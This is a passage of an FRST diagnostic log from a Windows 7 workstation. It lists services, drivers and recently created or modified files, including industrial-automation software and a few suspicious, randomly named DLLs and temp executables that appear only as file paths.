S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [73728 2004-10-22] (Macrovision Corporation) [File not signed]

R2 Ignition; C:\Program Files\Inductive Automation\Ignition\IgnitionGateway.exe [630552 2014-07-15] (Tanuki Software, Ltd.) [File not signed]

R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel® Corporation) [File not signed]

S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel® Corporation)

R2 Intel® ME Service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe [131544 2013-11-13] (Intel Corporation)

R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [169432 2013-11-13] (Intel Corporation)

S3 LogReceiver; C:\Program Files (x86)\Rockwell Software\RSLinx Enterprise\LogReceiver.exe [80232 2011-11-22] (Rockwell Automation, Inc.)

R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)

R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)

R2 MSSQL$FTVIEWX64TAGDB; C:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.FTVIEWX64TAGDB\MSSQL\Binn\sqlservr.exe [42884448 2010-04-03] (Microsoft Corporation)

R2 MSSQL$SUNBELT; C:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe [29293408 2010-12-10] (Microsoft Corporation)

R2 Rockwell HMI Diagnostics; C:\Program Files (x86)\Rockwell Software\RSView Enterprise\HMIDIAGNOSTICSLSTADAPT.exe [106344 2011-07-26] (Rockwell Automation, Inc.)

R2 Rockwell Tag Server; C:\Program Files (x86)\Rockwell Software\RSView Enterprise\TagSrv.exe [212328 2011-07-26] (Rockwell Automation, Inc.)

S3 RSLinx; C:\Program Files (x86)\Rockwell Software\RSLinx\RSLINX.EXE [2010488 2012-09-14] (Rockwell Automation, Inc.)

R2 RSLinxNG; C:\Program Files (x86)\Rockwell Software\RSLinx Enterprise\RSLinxNG.exe [246120 2011-11-22] (Rockwell Automation, Inc.)

R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [223816 2013-01-09] (Realtek Semiconductor)

S3 SimModuleService; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\SimModuleService.exe [95232 2012-06-05] () [File not signed]

R2 SONICWALL_NetExtender; C:\Program Files (x86)\SonicWALL\SSL-VPN\NetExtender\NEService64.exe [498560 2010-06-22] (SonicWALL Inc.)

S4 SQLAgent$FTVIEWX64TAGDB; C:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.FTVIEWX64TAGDB\MSSQL\Binn\SQLAGENT.EXE [367456 2010-04-03] (Microsoft Corporation)

R2 TgbIke Starter; C:\Windows\SysWOW64\TgbStarter.exe [239280 2011-11-15] (TheGreenBow)

R2 tvnserver; C:\Program Files\TightVNC\tvnserver.exe [2179056 2013-07-19] (GlavSoft LLC.)

R2 VMwareHostd; C:\Program Files (x86)\VMware\VMware Workstation\vmware-hostd.exe [14407384 2014-06-12] ()

 

==================== Drivers (Whitelisted) ====================

 

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

 

R0 amdkmpfd; C:\Windows\System32\drivers\amdkmpfd.sys [36520 2012-09-13] (Advanced Micro Devices, Inc.)

R3 e1dexpress; C:\Windows\System32\DRIVERS\e1d62x64.sys [496400 2013-02-26] (Intel Corporation)

R0 iaStorF; C:\Windows\System32\drivers\iaStorF.sys [28008 2013-08-30] (Intel Corporation)

R3 IntcAzAudAddService; C:\Windows\System32\drivers\RTDVHD64.sys [2143432 2013-04-09] (Realtek Semiconductor Corp.)

S3 irstrtdv; C:\Windows\system32\drivers\irstrtdv.sys [43800 2013-03-21] (Intel Corporation)

R1 mbamchameleon; C:\Windows\system32\drivers\mbamchameleon.sys [93400 2014-10-01] (Malwarebytes Corporation)

R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation)

R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-11-05] (Malwarebytes Corporation)

R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2014-10-01] (Malwarebytes Corporation)

R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [99288 2013-11-13] (Intel Corporation)

R3 NxDrv; C:\Windows\System32\DRIVERS\NxDrv.sys [24264 2009-10-21] (SonicWALL Inc.)

R3 O2FJ2RDR; C:\Windows\System32\DRIVERS\O2FJ2w7x64.sys [185760 2013-05-07] (O2Micro )

S3 RAUSBCIP; C:\Windows\System32\drivers\rausbcipwdf.sys [87552 2011-11-07] (Rockwell Automation, Inc.)

R1 SBRE; C:\Windows\system32\drivers\SBREdrv.sys [45656 2010-01-20] (Sunbelt Software)

S3 ST7007; C:\Windows\system32\drivers\ST7007.sys [69896 2013-02-21] (STMicroelectronics)

R3 ST_ACCEL; C:\Windows\System32\DRIVERS\ST_Accel.sys [89312 2013-03-27] (STMicroelectronics)

R3 TGBMPEnum; C:\Windows\System32\DRIVERS\TGBMPEnum.sys [40624 2011-11-15] (TheGreenBow)

R3 TGBVPNVirtM; C:\Windows\System32\DRIVERS\TGBVPNVirtM.sys [140464 2011-11-15] (TheGreenBow)

S3 USA19H; C:\Windows\System32\DRIVERS\USA19Hx64.sys [740096 2007-10-30] (Keyspan)

S3 USA19HP; C:\Windows\System32\DRIVERS\USA19Hx64p.SYS [35840 2007-10-23] (Keyspan)

S3 usbohci; C:\Windows\system32\drivers\usbohci.sys [25600 2011-03-24] (Microsoft Corporation) [File not signed]

S3 usbuhci; C:\Windows\system32\drivers\usbuhci.sys [30720 2011-03-24] (Microsoft Corporation) [File not signed]

R1 VirtualBackplane; C:\Windows\System32\Drivers\VirtualBackplane.sys [51200 2011-06-02] (Rockwell Automation)

R3 vmkbd2; C:\Windows\system32\drivers\VMkbd.sys [33496 2014-06-12] (VMware, Inc.)

R2 VMparport; C:\Windows\system32\drivers\VMparport.sys [32472 2014-06-12] (VMware, Inc.)

R0 vsock; C:\Windows\System32\drivers\vsock.sys [73296 2013-10-08] (VMware, Inc.)

R2 vstor2-mntapi20-shared; C:\Windows\SysWow64\drivers\vstor2-mntapi20-shared.sys [33872 2013-02-22] (VMware, Inc.)

S3 lmimirr; system32\DRIVERS\lmimirr.sys [X]

S3 pcidnt; \SystemRoot\System32\Drivers\pcidnt.sys [X]

 

==================== NetSvcs (Whitelisted) ===================

 

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

 

 

==================== One Month Created Files and Folders ========

 

(If an entry is included in the fixlist, the file\folder will be moved.)

 

2014-11-05 13:45 - 2014-11-05 13:45 - 00000113 _____ () C:\Users\Mark\Desktop\TMS.csv

2014-11-05 13:44 - 2014-11-05 13:44 - 00000309 _____ () C:\Users\Mark\Downloads\TMS.csv

2014-11-05 08:39 - 2014-11-05 08:39 - 00000028 _____ () C:\Windows\SysWOW64\u

2014-11-05 08:38 - 2014-11-05 08:38 - 00071168 _____ () C:\Windows\system32\tlttzup.dll

2014-11-05 08:38 - 2014-11-05 08:38 - 00003860 _____ () C:\Windows\System32\Tasks\{18B872B0-A550-C9CD-0FDB-34F22E20273C}

2014-11-05 08:38 - 2014-11-05 08:38 - 00000000 _____ () C:\Windows\system32\yvgmc.dll

2014-11-05 08:21 - 2014-11-05 08:21 - 00000000 ____D () C:\Users\Mark\Desktop\FRST-OlderVersion

2014-11-05 08:13 - 2014-11-05 08:14 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CyberLink PowerDVD 9.6

2014-11-04 11:55 - 2014-11-04 11:12 - 19828376 _____ (Malwarebytes Corporation ) C:\mbam-setup-2.0.3.1025.exe

2014-11-04 11:12 - 2014-11-04 11:12 - 19828376 _____ (Malwarebytes Corporation ) C:\Users\Mark\Downloads\mbam-setup-2.0.3.1025.exe

2014-11-01 08:59 - 2014-11-01 08:59 - 922953262 _____ () C:\Windows\MEMORY.DMP

2014-11-01 08:59 - 2014-11-01 08:59 - 00284128 _____ () C:\Windows\Minidump\110114-22760-01.dmp

2014-11-01 08:59 - 2014-11-01 08:59 - 00000000 ____D () C:\Windows\Minidump

2014-10-31 20:01 - 2014-10-31 20:01 - 00000000 ____D () C:\Users\Mark\AppData\Local\YWPack

2014-10-31 13:41 - 2014-11-05 15:51 - 00001008 _____ () C:\Windows\setupact.log

2014-10-31 13:41 - 2014-10-31 13:41 - 00000000 _____ () C:\Windows\setuperr.log

2014-10-31 12:55 - 2014-11-03 22:34 - 00000000 ___HD () C:\383d109

2014-10-29 07:16 - 2014-10-29 20:48 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\0CEB3AF1.sys

2014-10-28 09:14 - 2014-11-05 08:24 - 00000970 _____ () C:\Users\Mark\Desktop\Addition.txt

2014-10-28 09:13 - 2014-11-05 16:34 - 00031640 _____ () C:\Users\Mark\Desktop\FRST.txt

2014-10-28 09:13 - 2014-11-05 16:33 - 00000000 ____D () C:\FRST

2014-10-28 09:13 - 2014-11-05 08:21 - 02114560 _____ (Farbar) C:\Users\Mark\Desktop\FRST64.exe

2014-10-27 14:56 - 2014-10-28 07:22 - 00000000 ____D () C:\Program Files (x86)\ACTi Corporation

2014-10-27 14:56 - 2014-10-27 14:59 - 00000000 ____D () C:\Users\Mark\AppData\Local\NVR3 Workstation

2014-10-27 14:55 - 2014-10-27 14:55 - 00000000 ____D () C:\Users\Mark\Desktop\NVR_3_Workstation_for_Windows_Software_V.3.0.09.16_20140627

2014-10-27 14:53 - 2014-10-27 14:53 - 00000000 ____D () C:\Users\Mark\Documents\NVR_3_Workstation_for_Windows_Software_V.3.0.09.16_20140627

2014-10-27 14:26 - 2014-10-27 14:26 - 00008913 _____ () C:\Users\Mark\Desktop\LiveDemoSample.htm

2014-10-27 14:24 - 2014-10-27 14:24 - 00000000 ____D () C:\Users\Mark\Downloads\LiveDemoSampleFiles_20110630_001

2014-10-27 14:20 - 2014-10-27 14:20 - 00008913 _____ () C:\Users\Mark\Downloads\LiveDemoSampleFiles_20110630_001.zip

2014-10-27 13:11 - 2014-10-27 13:11 - 00000000 ____D () C:\Users\Mark\Documents\IP_Utility_V.4.3.08_20140702

2014-10-24 18:51 - 2014-10-24 18:51 - 00000000 ____D () C:\Users\Mark\AppData\Roaming\Apple Computer

2014-10-24 08:48 - 2014-10-24 08:48 - 00001891 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk

2014-10-24 08:48 - 2014-10-24 08:48 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime

2014-10-24 08:48 - 2014-10-24 08:48 - 00000000 ____D () C:\ProgramData\Apple Computer

2014-10-24 08:48 - 2014-10-24 08:48 - 00000000 ____D () C:\Program Files (x86)\QuickTime

2014-10-24 08:47 - 2014-10-24 08:47 - 00000000 ____D () C:\Users\Mark\AppData\Local\Apple

2014-10-24 08:47 - 2014-10-24 08:47 - 00000000 ____D () C:\ProgramData\Apple

2014-10-24 08:46 - 2014-10-24 08:47 - 39401336 _____ (Apple Inc.) C:\Users\Mark\Downloads\QuickTimeInstaller.exe

2014-10-21 08:30 - 2014-10-21 08:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HMS

2014-10-21 08:30 - 2014-10-21 08:30 - 00000000 ____D () C:\ProgramData\HMS

2014-10-21 08:30 - 2014-10-21 08:30 - 00000000 ____D () C:\Program Files (x86)\HMS

2014-10-15 14:31 - 2014-10-09 20:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll

2014-10-15 14:31 - 2014-10-09 20:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll

2014-10-15 14:31 - 2014-10-09 20:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll

2014-10-15 14:31 - 2014-10-06 20:54 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll

2014-10-15 14:31 - 2014-10-06 20:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll

2014-10-15 14:31 - 2014-09-28 18:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys

2014-10-15 14:31 - 2014-09-25 16:50 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll

2014-10-15 14:31 - 2014-09-25 16:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll

2014-10-15 14:31 - 2014-09-25 16:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll

2014-10-15 14:31 - 2014-09-25 16:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll

2014-10-15 14:31 - 2014-09-25 16:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll

2014-10-15 14:31 - 2014-09-25 16:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl

2014-10-15 14:31 - 2014-09-25 16:31 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl

2014-10-15 14:31 - 2014-09-18 20:25 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll

2014-10-15 14:31 - 2014-09-18 19:56 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb

2014-10-15 14:31 - 2014-09-18 19:55 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll

2014-10-15 14:31 - 2014-09-18 19:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll

2014-10-15 14:31 - 2014-09-18 19:41 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll

2014-10-15 14:31 - 2014-09-18 19:40 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll

2014-10-15 14:31 - 2014-09-18 19:40 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll

2014-10-15 14:31 - 2014-09-18 19:39 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll

2014-10-15 14:31 - 2014-09-18 19:38 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll

2014-10-15 14:31 - 2014-09-18 19:36 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll

2014-10-15 14:31 - 2014-09-18 19:31 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll

2014-10-15 14:31 - 2014-09-18 19:30 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll

2014-10-15 14:31 - 2014-09-18 19:27 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll

2014-10-15 14:31 - 2014-09-18 19:26 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe

2014-10-15 14:31 - 2014-09-18 19:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll

2014-10-15 14:31 - 2014-09-18 19:25 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll

2014-10-15 14:31 - 2014-09-18 19:25 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe

2014-10-15 14:31 - 2014-09-18 19:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe

2014-10-15 14:31 - 2014-09-18 19:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb

2014-10-15 14:31 - 2014-09-18 19:14 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll

2014-10-15 14:31 - 2014-09-18 19:06 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll

2014-10-15 14:31 - 2014-09-18 19:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll

2014-10-15 14:31 - 2014-09-18 19:01 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll

2014-10-15 14:31 - 2014-09-18 19:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll

2014-10-15 14:31 - 2014-09-18 19:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll

2014-10-15 14:31 - 2014-09-18 19:00 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll

2014-10-15 14:31 - 2014-09-18 18:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll

2014-10-15 14:31 - 2014-09-18 18:58 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll

2014-10-15 14:31 - 2014-09-18 18:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll

2014-10-15 14:31 - 2014-09-18 18:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll

2014-10-15 14:31 - 2014-09-18 18:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll

2014-10-15 14:31 - 2014-09-18 18:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll

2014-10-15 14:31 - 2014-09-18 18:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe

2014-10-15 14:31 - 2014-09-18 18:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll

2014-10-15 14:31 - 2014-09-18 18:42 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll

2014-10-15 14:31 - 2014-09-18 18:42 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe

2014-10-15 14:31 - 2014-09-18 18:40 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll

2014-10-15 14:31 - 2014-09-18 18:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll

2014-10-15 14:31 - 2014-09-18 18:33 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll

2014-10-15 14:31 - 2014-09-18 18:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll

2014-10-15 14:31 - 2014-09-18 18:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll

2014-10-15 14:31 - 2014-09-18 18:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll

2014-10-15 14:31 - 2014-09-18 18:14 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll

2014-10-15 14:31 - 2014-09-18 17:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll

2014-10-15 14:31 - 2014-09-18 17:59 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll

2014-10-15 14:31 - 2014-09-18 17:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll

2014-10-15 14:31 - 2014-09-18 17:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll

2014-10-15 14:31 - 2014-06-18 16:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll

2014-10-15 14:31 - 2014-06-18 16:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll

2014-10-15 14:31 - 2014-06-18 16:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll

2014-10-15 14:31 - 2014-06-18 16:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll

2014-10-15 14:31 - 2014-06-18 16:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll

2014-10-15 14:31 - 2014-06-18 16:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll

2014-10-15 14:30 - 2014-09-17 20:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll

2014-10-15 14:30 - 2014-09-17 19:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll

2014-10-15 14:30 - 2014-09-12 19:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll

2014-10-15 14:30 - 2014-09-12 19:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll

2014-10-15 14:30 - 2014-09-03 23:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll

2014-10-15 14:30 - 2014-09-03 23:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll

2014-10-15 14:30 - 2014-07-16 20:07 - 03722240 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll

2014-10-15 14:30 - 2014-07-16 20:07 - 01118720 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe

2014-10-15 14:30 - 2014-07-16 20:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll

2014-10-15 14:30 - 2014-07-16 20:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe

2014-10-15 14:30 - 2014-07-16 20:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll

2014-10-15 14:30 - 2014-07-16 20:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll

2014-10-15 14:30 - 2014-07-16 20:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll

2014-10-15 14:30 - 2014-07-16 20:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll

2014-10-15 14:30 - 2014-07-16 19:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll

2014-10-15 14:30 - 2014-07-16 19:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll

2014-10-15 14:30 - 2014-07-16 19:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe

2014-10-15 14:30 - 2014-07-16 19:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll

2014-10-15 14:30 - 2014-07-16 19:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll

2014-10-15 14:30 - 2014-07-16 19:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll

2014-10-15 14:30 - 2014-07-16 19:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys

2014-10-15 14:30 - 2014-07-16 19:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys

2014-10-15 13:10 - 2014-10-15 13:37 - 00000816 _____ () C:\Users\Mark\Desktop\Harwood delete.txt

 

==================== One Month Modified Files and Folders =======

 

(If an entry is included in the fixlist, the file\folder will be moved.)

 

2014-11-05 16:31 - 2014-04-25 20:31 - 00000911 _____ () C:\Windows\Tasks\EPSON XP-610 Series Update {764B7596-3AFD-44A0-8816-6BF3CD79EC16}.job

2014-11-05 16:31 - 2014-04-25 20:31 - 00000725 _____ () C:\Windows\Tasks\EPSON XP-610 Series Invitation {764B7596-3AFD-44A0-8816-6BF3CD79EC16}.job

2014-11-05 16:30 - 2014-04-29 11:00 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job

2014-11-05 16:29 - 2014-04-03 11:22 - 00002018 ____H () C:\Users\Mark\Documents\Default.rdp

2014-11-05 16:26 - 2014-04-10 15:12 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job

2014-11-05 16:02 - 2014-04-04 07:19 - 00000000 ____D () C:\Users\Mark\AppData\Local\SugarSync

2014-11-05 14:38 - 2014-05-14 15:00 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys

2014-11-05 08:22 - 2009-07-13 23:13 - 00979824 _____ () C:\Windows\system32\PerfStringBackup.INI

2014-11-05 08:21 - 2009-07-13 22:45 - 00030896 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0

2014-11-05 08:21 - 2009-07-13 22:45 - 00030896 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0

2014-11-05 08:14 - 2014-04-30 13:51 - 00000000 ____D () C:\ProgramData\VMware

2014-11-05 08:14 - 2014-04-16 07:15 - 00018200 _____ () C:\WindowsPODIUM.LOG

2014-11-05 08:13 - 2014-04-29 11:00 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job

2014-11-05 08:12 - 2009-07-13 23:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT

2014-11-04 20:57 - 2014-04-21 14:34 - 00000000 ____D () C:\Program Files (x86)\Steam

2014-11-04 20:17 - 2014-04-03 20:04 - 00000000 ____D () C:\Users\Mark\Desktop\pics

2014-11-03 14:52 - 2014-04-03 09:31 - 00000000 ____D () C:\Users\Mark\AppData\Local\CrashDumps

2014-11-02 09:51 - 2010-11-20 21:47 - 00217722 _____ () C:\Windows\PFRO.log

2014-11-01 09:19 - 2014-03-20 10:43 - 00000000 ____D () C:\ProgramData\Sonic

2014-10-31 20:06 - 2014-04-23 07:33 - 00000000 __SHD () C:\Users\Mark\AppData\Local\EmieUserList

2014-10-31 20:06 - 2014-04-23 07:33 - 00000000 __SHD () C:\Users\Mark\AppData\Local\EmieSiteList

2014-10-31 12:55 - 2014-03-20 10:29 - 01949165 _____ () C:\Windows\WindowsUpdate.log

2014-10-29 13:38 - 2014-04-10 09:02 - 00000028 _____ () C:\Windows\ODBC.INI

2014-10-29 12:12 - 2014-09-26 07:57 - 00000000 ____D () C:\ProgramData\Package Cache

2014-10-29 12:12 - 2014-04-21 15:07 - 00000000 ____D () C:\Users\Mark\Documents\My Games

2014-10-29 12:12 - 2014-04-21 15:07 - 00000000 ____D () C:\Users\Mark\AppData\Local\My Games

2014-10-29 12:12 - 2014-03-20 10:41 - 00257666 _____ () C:\Windows\DirectX.log

2014-10-29 07:15 - 2014-04-16 07:15 - 00000085 _____ () C:\Windows\FW.INI

2014-10-28 12:05 - 2014-05-29 11:50 - 00000000 ____D () C:\Users\Mark\AppData\Local\VMware

2014-10-28 12:05 - 2014-05-01 08:23 - 00000000 ____D () C:\Users\Mark\AppData\Roaming\VMware

2014-10-28 09:17 - 2014-08-15 13:34 - 00000000 ____D () C:\Users\Mark\AppData\Roaming\BitTorrent

2014-10-28 07:23 - 2014-09-11 09:58 - 00000000 ____D () C:\Program Files (x86)\Citrix

2014-10-28 07:22 - 2014-03-20 10:36 - 00000000 ___HD () C:\Program Files (x86)\InstallShield Installation Information

2014-10-28 05:34 - 2010-11-20 21:27 - 00275080 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe

2014-10-27 10:57 - 2014-04-10 12:48 - 00000000 ____D () C:\Data

2014-10-22 13:24 - 2014-05-13 09:22 - 00000108 _____ () C:\Windows\RADrvDLX.INI

2014-10-21 15:10 - 2014-05-14 15:00 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware

2014-10-21 15:10 - 2014-05-14 15:00 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware

2014-10-17 14:03 - 2009-07-13 21:20 - 00000000 ____D () C:\Windows\rescache

2014-10-16 19:25 - 2014-04-29 11:00 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA

2014-10-16 19:25 - 2014-04-29 11:00 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore

2014-10-16 07:17 - 2009-07-13 22:45 - 00551016 _____ () C:\Windows\system32\FNTCACHE.DAT

2014-10-16 07:14 - 2014-05-06 10:15 - 00000000 ___SD () C:\Windows\system32\CompatTel

2014-10-15 16:17 - 2014-04-03 15:42 - 00000000 ____D () C:\ProgramData\Microsoft Help

2014-10-15 16:10 - 2014-04-07 13:16 - 00000000 ____D () C:\Windows\system32\MRT

2014-10-15 16:08 - 2014-04-07 13:16 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe

2014-10-15 11:08 - 2014-05-21 07:50 - 00000460 _____ () C:\Users\Mark\Documents\RALinxDriverServer.err

2014-10-12 17:14 - 2014-04-03 20:46 - 00000000 ____D () C:\Users\Mark\AppData\Roaming\.minecraft

 

Some content of TEMP:

====================

C:\Users\Mark\AppData\Local\Temp\stuprt.exe

 

 

==================== Bamital & volsnap Check =================

 

(There is no automatic fix for files that do not pass verification.)

 

C:\Windows\System32\winlogon.exe => File is digitally signed

C:\Windows\System32\wininit.exe => File is digitally signed

C:\Windows\SysWOW64\wininit.exe => File is digitally signed

C:\Windows\explorer.exe => File is digitally signed

C:\Windows\SysWOW64\explorer.exe => File is digitally signed

C:\Windows\System32\svchost.exe => File is digitally signed

C:\Windows\SysWOW64\svchost.exe => File is digitally signed

C:\Windows\System32\services.exe => File is digitally signed

C:\Windows\System32\User32.dll => File is digitally signed

C:\Windows\SysWOW64\User32.dll => File is digitally signed

C:\Windows\System32\userinit.exe => File is digitally signed

